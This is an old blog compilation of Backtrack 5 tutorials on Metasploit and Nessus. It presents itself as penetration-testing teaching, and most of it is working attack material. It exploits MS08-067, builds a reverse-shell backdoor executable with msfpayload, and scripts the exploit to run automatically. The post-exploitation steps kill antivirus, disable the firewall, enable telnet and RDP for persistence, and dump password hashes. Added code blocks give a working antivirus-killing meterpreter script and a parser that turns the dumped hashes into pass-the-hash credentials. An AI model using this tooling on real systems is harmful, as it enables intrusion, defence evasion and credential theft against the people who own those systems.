Tuesday 31 July 2012

Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial


Nessus is one of the best vulnerability scanning, management and assessment tools, and Metasploit is the best-known exploitation framework and exploit database. Each is strong in its own domain, but connected together they form a very capable penetration testing toolchain: Nessus finds the weakness, Metasploit exploits it. There is more than one way to do this, and we have already shared different methods and tutorials for integrating Metasploit with Nessus (and vice versa).

In this article we will discuss a video tutorial in which I show the combined power of Nessus and Metasploit. This tutorial is a little different from the ones discussed before about Nessus, Metasploit, Nmap and Nexpose.

Here is a list of some of those tutorials, followed by what makes this one different.

Below is the tutorial in which I show some of the more advanced features of Nessus, such as the Filter feature to list only the findings for which a public exploit is available, and then use Metasploit to exploit the vulnerability that Nessus found.

Nessus Metasploit On Backtrack 5



After watching the video tutorial on Nessus with Metasploit on Backtrack 5 you should have an idea of how a vulnerable computer gets compromised. This is exactly why vulnerability scanning and patch management are so important.

Metasploit Tutorials From Beginner to Advance


Metasploit is the database of exploits, or the master of exploits; there are many Metasploit tutorials available on the Internet and some of them are very useful. You can find tutorials on using Metasploit with other tools such as Nmap, Nessus, Nexpose and OpenVAS, and we have also shared different video and text tutorials on Metasploit. This article does not introduce a new Metasploit tutorial; it is an index page for the Metasploit tutorials we have published.

As we have shared a list of Backtrack 5 tutorials, here is the list of Metasploit tutorials that will help a newbie or a professional learn Metasploit and apply it in a real penetration testing environment.

Metasploit- An Introduction

Armitage - Cyber Attack Management

Integrate Nessus With Metasploit- Tutorial

How To Use Armitage In Backtrack 5- Tutorial

Fast Track Hacking-Backtrack5 Tutorial

Metasploit 4 Advance Penetration Testing Tool

Karmetasploit- Backtrack 5 Tutorial

Social Engineering toolkit Tutorial-Backtrack 5

Metasploit Autopwn With Nessus Backtrack 5 Tutorial

Autopwn Metasploit Backtrack 5- Postgresql Solved

Metasploit Remote Desktop Exploit-Backtrack 5

Nexpose Vulnerability Scanner Tutorial- Linux Backtrack

Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial


This list will be updated as soon as new articles are published, so keep in touch to learn more about hacking and penetration testing with Metasploit on a Backtrack machine.

Metasploit Basic Command Tutorial


Many new users of Metasploit have asked us to write an introductory article about the basic Metasploit commands and basic usage of Metasploit. We have shared different mid-level and advanced Metasploit tutorials on Backtrack 5 from which you can learn different commands, but here is a list of the most common commands used in Metasploit for different purposes. Later on we will share meterpreter commands as well.



Metasploit is a framework that bundles exploits together with information about them, so here is its basic usage. I am using a Backtrack 5 machine for this tutorial, but any other Linux distribution or Windows is fine too; the only requirement is Metasploit.


Msfconsole


Msfconsole is the console (command window) of Metasploit. It gives you full access to Metasploit's own commands and also passes commands it does not recognise to the underlying shell. There used to be a web interface (msfweb), but that option has been removed.

So, in your terminal, type msfconsole to start the Metasploit console.


root@bt:~# msfconsole
Metasploit is also available with a GUI (graphical user interface); to run the Metasploit GUI, type the following in the terminal.


root@bt:~# msfgui


The help command gives you the basic idea of Metasploit usage. If you are looking for the msfconsole command-line help, type this from the root shell:

root@bt:~# msfconsole -h


For help on the commands inside msfconsole you need to be at the msfconsole prompt:

msf > help

The connect command is Metasploit's built-in alternative to telnet and ncat: use it to open a raw connection to a remote or local host by giving the host and port. With -s the connection is wrapped in SSL, so you can talk HTTP to an HTTPS server:



msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0

(-s wraps the connection in SSL)



There is no ping command built into msfconsole. When you type ping, msfconsole finds no such command of its own and runs the operating system's ping for you (it prints "[*] exec: ping ..." first), so this is a quick way to check whether a host is alive without leaving the console:

msf > ping 192.168.1.45

show exploits lists all the exploits available in Metasploit:

msf > show exploits

Just like show exploits, show payloads lists all the available payloads:

msf > show payloads


The info command gives you more information about an exploit or payload (description, targets, options and references):

msf > info <exploit>
msf > info <payload>


The use command tells Metasploit to load an exploit (or payload/auxiliary/post) module; the prompt changes to show which module is active:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options → show the module's options
msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → set the remote IP (victim)
msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → set the local IP (attacker) the payload connects back to
msf exploit(ms08_067_netapi) > set rport 445 → set the port of the remote host
msf exploit(ms08_067_netapi) > set lport 443 → set the local listening port
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → set the payload

msf exploit(ms08_067_netapi) > unset rhost → clear rhost
msf exploit(ms08_067_netapi) > unset lhost → clear lhost
msf exploit(ms08_067_netapi) > exploit → run the exploit
msf exploit(ms08_067_netapi) > back → return to the main prompt
msf exploit(ms08_067_netapi) > sessions -l → list active sessions
msf exploit(ms08_067_netapi) > sessions -i ID → interact with a session; ID is the numeric session number shown by sessions -l

Buffer Overflow Attack Tutorial - Backtrack 5


Firewalls and anti-virus protect your computer from attacks and viruses, but an attacker can sometimes bypass them and gain root access; there are many techniques and tools for evading anti-virus and firewalls. Buffer overflow is one of the most common classes of attack that lets an attacker gain administrator-level access to a computer or a network. We have discussed many tutorials on hacking into Windows using Backtrack 5; keep in mind that many exploits are also available for Linux.

I really don't know who the author of this video is, but the video contains a good example of a buffer overflow attack using an exploit.

Requirements

  • Backtrack 5 or Backtrack 5 R1 (Attacker)
  • Windows (Victim)
  • Metasploit
  • Apache
  • Brain


Armitage and Metasploit Video Tutorial – Hacking Training


Armitage has changed the way of hacking: Armitage acts as a graphical user interface for Metasploit. There are many tutorials on Metasploit and Armitage available on the Internet, and we have also discussed Armitage and Metasploit in different articles using Backtrack 5 R1. Below are video tutorials on Metasploit and Armitage that cover Armitage hacking from the beginning. These excellent video lectures were created by Raphael Mudge.

Introduction

This lecture introduces penetration testing, this course, and the overall network penetration testing process.


Metasploit

This lecture introduces the Metasploit Framework and Armitage. By the end of this lecture, you will understand Metasploit, the vocabulary around it, and how to work in the Metasploit console.

Access

This lecture teaches you how to use Metasploit to break into hosts. You'll learn how to hack without exploits, use client-side attacks, and launch the right remote exploit when applicable.






Post-Exploitation

This lecture teaches what to do after you break into a host. You'll learn how to interact with a host, browse files, steal keystrokes, kill programs, and use Metasploit's powerful post-exploitation modules. Armitage's logging features are covered as well.

Maneuver

The last step is to take your access and turn it into more access. This lecture shows how to use Metasploit's pivoting to get at otherwise unreachable hosts, scan through a pivot, dump hashes, and abuse a Windows Active Directory domain. 




  

Team Tactics

Now you know the whole network attack process, but you'll rarely work alone. This lecture shows you how to use the teaming features of Armitage to accomplish everything from the previous lectures. You'll learn how to use Armitage for real-time communication, data sharing, and session sharing. Finally, you'll also learn how to use external tools with Metasploit's pivoting ability. 

Source

Metasploit Meterpreter Scripting Backtrack 5 Tutorial


Information security is a broad field that includes penetration testing as well as computer forensics. There are many tools for performing a penetration test against a target, and Metasploit is one of the best. Meterpreter is a powerful Metasploit payload: it is injected into memory as a DLL (it never touches disk) and talks back to the attacker over the socket the stager opened. Running on the compromised host, it provides a rich environment for running commands, transferring files and loading further extensions.


A meterpreter session is established after successfully exploiting the host. The meterpreter scripts that ship with Metasploit automate many post-exploitation tasks, such as:

  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more
Even with the numerous scripts available, you are free to write your own, best suited to your work. Some important points about meterpreter scripts:
  • They are written in Ruby
  • They live in the Metasploit directory (scripts/meterpreter under the framework root)
  • New scripts are contributed regularly by different authors; the set shipped with your framework is the place to check what is available
  • They are very helpful for automating work after a host is compromised
  • They are built on the meterpreter API: the client object exposes the stdapi functions for the file system, processes, registry and networking
Many scripts are publicly available, but if you want to create a new script of your own, even for public use, that is readily doable. You just need to follow some rules so that your script does not conflict with the framework's own variables. Ruby is the basic requirement for writing a meterpreter script. Other important rules are:
  • Always include a description so that others understand what the script does
  • Use local variables, not global variables
  • Always provide a help option (-h) for better usability
  • Keep the target host in mind (operating system, service pack on Windows, kernel on Unix) while writing a script, because not every system has every vulnerability or feature the script relies on
Let us consider an example. In our scenario we need to create a backdoor executable so that we can send it to the victim. This doesn't have to be a big deal; you can even create a backdoor using fast-track. With msfpayload, the trailing X tells it to wrap the payload in a Windows executable; whatever name you give the file, it is a PE binary and must be run on the victim to connect back to LHOST:LPORT:

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > test.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}


Having typed all that once, we can automate it by putting the same command in a small Ruby script (note that the script is written to the file, not just echoed to the terminal):
root@bt:/pentest/exploits/framework3# cat > a.rb <<'EOF'
#!/usr/bin/env ruby
# regenerate the backdoor with the same options every time
system("msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > test.exe")
EOF
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is the same. Generating the file by hand is quick enough once, but repeating the same step again and again is what costs time, so why not script it? That is exactly what the meterpreter scripts shipped with the framework do for post-exploitation tasks.


That was a small example. Now let's create a resource script that drives an exploit against a vulnerable operating system:

root@bt:/pentest/exploits/framework3# echo "use exploit/windows/smb/ms08_067_netapi" > test.rc
root@bt:/pentest/exploits/framework3# echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> test.rc
root@bt:/pentest/exploits/framework3# echo "set LHOST 192.168.1.2" >> test.rc
root@bt:/pentest/exploits/framework3# echo "set RHOST 192.168.1.6" >> test.rc
root@bt:/pentest/exploits/framework3# echo "exploit" >> test.rc
root@bt:/pentest/exploits/framework3# cat test.rc
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set RHOST 192.168.1.6
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Compare that with doing the job manually, where we would have to type in:
  • The exploit (in this case I had already run Nessus, which is why I know the system is vulnerable to the MS08-067 netapi bug)
  • The remote host
  • The local host and port
After execution, a meterpreter session opens only if the operating system is actually vulnerable, as it was in this case:


Within this meterpreter session we can call different scripts, and we can write our own as discussed above. Below I show some of the most useful meterpreter scripts for penetration testing; developers refine these scripts constantly, so stay active in the community and on blogs and forums to keep yourself up to date.

Screenspy Script

This basic script captures the victim's screen. All you need to do is type "run screenspy"; for usage help type "run screenspy -h" at the meterpreter prompt. After execution, Firefox opens with a picture of the victim's screen at that moment.

KillAv Script

Killav is a well-known script. As the name suggests, it kills (terminates) anti-virus processes, so if you don't want anti-virus software disturbing you, use this script to kill it:

meterpreter > run killav
  [*] Killing Antivirus services on the target...
  meterpreter >

Killav knows the process names of most of the better-known anti-virus products, but if the target runs a newer one you will need to edit the script and add its executable name. Looking in the script file, we find process names such as:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe
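
The script-writing rules above (a description, a -h help option, local variables only) are easiest to see in a script of killav's shape. The Ruby below is an added example, not one of the framework's own scripts: the process-matching logic is in plain functions so it can be exercised outside a session, and the meterpreter API calls (client.sys.process.get_processes, client.sys.process.getpid, client.sys.process.kill, Rex::Parser::Arguments) run only when the script is started with run inside a live session, where client and args are defined. The process names are a short constructed sample drawn from the list above; extend them for your target.

```ruby
# Added example, not one of the framework's own scripts: a killav-style
# meterpreter script following the rules above (description, -h help option,
# local variables only). Matching logic is in plain functions so it can run
# outside a session; the meterpreter API calls run only inside `run`, where
# `client` and `args` exist. Process names are a constructed sample.
DESCRIPTION = "List (or with -k, kill) known antivirus and firewall processes on the target"

# Assumed names to look for; comparison is case-insensitive, like killav's.
AV_PROCESS_NAMES = %w[zonealarm.exe zapro.exe wradmin.exe winupdate.exe wupdater.exe].freeze

# Given a process list as get_processes returns it (array of hashes with
# string keys 'pid' and 'name'), return the entries whose name is on the list.
def find_av_processes(processes, names = AV_PROCESS_NAMES)
  wanted = names.map(&:downcase)
  processes.select { |p| wanted.include?(p['name'].to_s.downcase) }
end

# Pids to kill: everything that matched except the process meterpreter itself
# lives in, since killing that would drop our own session.
def pids_to_kill(matches, own_pid)
  matches.map { |p| p['pid'] }.reject { |pid| pid == own_pid }
end

def usage
  puts DESCRIPTION
  puts "OPTIONS:"
  puts "  -h  Help menu"
  puts "  -k  Kill the matching processes (default: list only)"
end

# Everything below runs only inside a meterpreter session.
if defined?(client) && client
  kill = false
  opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu"],
    "-k" => [false, "Kill matching processes"]
  )
  opts.parse(args) do |opt, _idx, _val|
    case opt
    when "-h"
      usage
      raise Rex::Script::Completed   # the framework's way to end a script early
    when "-k"
      kill = true
    end
  end

  matches = find_av_processes(client.sys.process.get_processes)
  if matches.empty?
    print_status("No known AV/firewall processes found")
  else
    matches.each { |p| print_status("Found #{p['name']} (pid #{p['pid']})") }
    if kill
      pids_to_kill(matches, client.sys.process.getpid).each do |pid|
        print_status("Killing pid #{pid}")
        client.sys.process.kill(pid)
      end
    end
  end
end
```

Drop the file into scripts/meterpreter and start it with run, just like killav. Listing before killing is deliberate: killing processes is noisy and irreversible, and the own-pid check matters because meterpreter may have been migrated into a process whose name happens to be on the list.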

Getcountermeasure Script

Killav is a powerful script and kills many anti-virus products, but the problem is that when you run killav, Windows may show errors and other alerts, not to mention the firewall. A script called Getcountermeasure covers this ground better:

meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Consider how powerful this script is: it deals with the Windows firewall, anti-virus, HIPS and third-party firewalls, which are very common nowadays. It is a step up from killav. To use it:

meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...
Note what the options do and do not do: -d switches off the built-in firewall and -k kills the AV, HIPS and firewall processes it recognises, which is noisy and leaves traces in the event log. Clearing the Windows event logs is a separate step (the meterpreter clearev command).

Gettelnet script

Telnet is one of the oldest remote-access services on Windows. The gettelnet script enables the Telnet service on the victim (and can add a user for it), so it is a convenient way to keep a way back in for later. Bear in mind that Telnet is unencrypted; an SSH service is the better choice for remote access, and netcat can also be installed on a compromised host as a backdoor for future connections. Use this command to get more help:
  meterpreter > run gettelnet -h

There are many other scripts, but here we discuss only the most important ones. These help you understand the network and set up future connections:
Netenum - Network Enumeration Script
Netenum is a network enumeration script whose options let you:
  • Perform a DNS forward lookup on a host list for a given domain
  • Target an address range or CIDR identifier
  • Look up the MX and NS records for a domain
  • Look up the service (SRV) records for a domain
  • Run a ping sweep over an IP range

Checkvm- Check Virtual Machine

Virtual machines are now an important part of enterprise networks, and most large (and even small) networks use them. Checkvm is a script that tells you whether the victim is a virtual machine or not, and if so, which type. Here is the output in this case:

 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan Bypass

This script bypasses McAfee VirusScan Enterprise v8.7.0i+: it uploads an executable to the TEMP folder, adds it to the exclusion list and sets it to run at startup. Although we have discussed two scripts that kill anti-virus protection, it is good to have different scripts available to verify your attack.
  
  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If you want a graphical interface to the victim's computer, you need to enable the RDP (Remote Desktop Protocol) service; getgui -e does that (and with -u and -p it can also add a user to log in with):
  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump

Last but not least, I don't want to end this article without mentioning hashdump, which collects the password hashes from the victim for later use. In many environments the same local passwords, and therefore the same hashes, are valid on other hosts, and NTLM hashes can be replayed (pass-the-hash) without cracking them:

 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
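
Reading a hashdump listing correctly is the part that decides what to do next with each account. As an added example (not part of the original post), the Ruby below parses the pwdump-format lines shown above and sorts the accounts by what they offer: an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password (nothing to crack), an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored (LM hashing disabled, or an empty password), and any account with a real NT hash can be replayed as "LM:NT", which is the SMBPass form the psexec module accepts. The sample input is the listing from the page; the function and hash-key names are the example's own.

```ruby
# Added example (not part of the original post): triage a pwdump-style
# hashdump listing (user:rid:LM:NT:::). The two constants are the well-known
# "empty" LM and NT values; the sample listing is the one shown above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

HASHDUMP = <<~TXT
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
TXT

# Parse pwdump lines into hashes. Malformed lines raise rather than being
# silently skipped, since a bad parse here means a bad credential later.
def parse_hashdump(text)
  text.each_line.map(&:strip).reject(&:empty?).map do |line|
    user, rid, lm, nt = line.split(":", 5)   # 5th field is the trailing "::"
    unless lm.to_s =~ /\A\h{32}\z/ && nt.to_s =~ /\A\h{32}\z/
      raise ArgumentError, "not a pwdump line: #{line}"
    end
    lm = lm.downcase
    nt = nt.downcase
    { user: user, rid: rid.to_i, lm: lm, nt: nt,
      blank_password: nt == EMPTY_NT,   # empty password: nothing to crack
      lm_stored: lm != EMPTY_LM }        # LM hash present: trivially crackable
  end
end

# Sort the accounts into what you would do next with each.
def triage(entries)
  {
    blank: entries.select { |e| e[:blank_password] }.map { |e| e[:user] },
    lm_crackable: entries.select { |e| e[:lm_stored] }.map { |e| e[:user] },
    # "LM:NT" is the SMBPass form the psexec module accepts for pass-the-hash.
    pass_the_hash: entries.reject { |e| e[:blank_password] }
                          .map { |e| [e[:user], "#{e[:lm]}:#{e[:nt]}"] }.to_h
  }
end

if __FILE__ == $0
  t = triage(parse_hashdump(HASHDUMP))
  puts "blank passwords : #{t[:blank].join(', ')}"
  puts "LM hash stored  : #{t[:lm_crackable].join(', ')}"
  t[:pass_the_hash].each { |u, h| puts "pth #{u}: set SMBPass #{h}" }
end
```

On the listing above this reports Administrator and Guest as blank passwords, HelpAssistant as the one account with an LM hash worth cracking, and HelpAssistant and SUPPORT_388945a0 as candidates for pass-the-hash against other hosts with psexec (set SMBUser to the account and SMBPass to the LM:NT string).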

If you have some other wonderful scripts, please share with in the comments!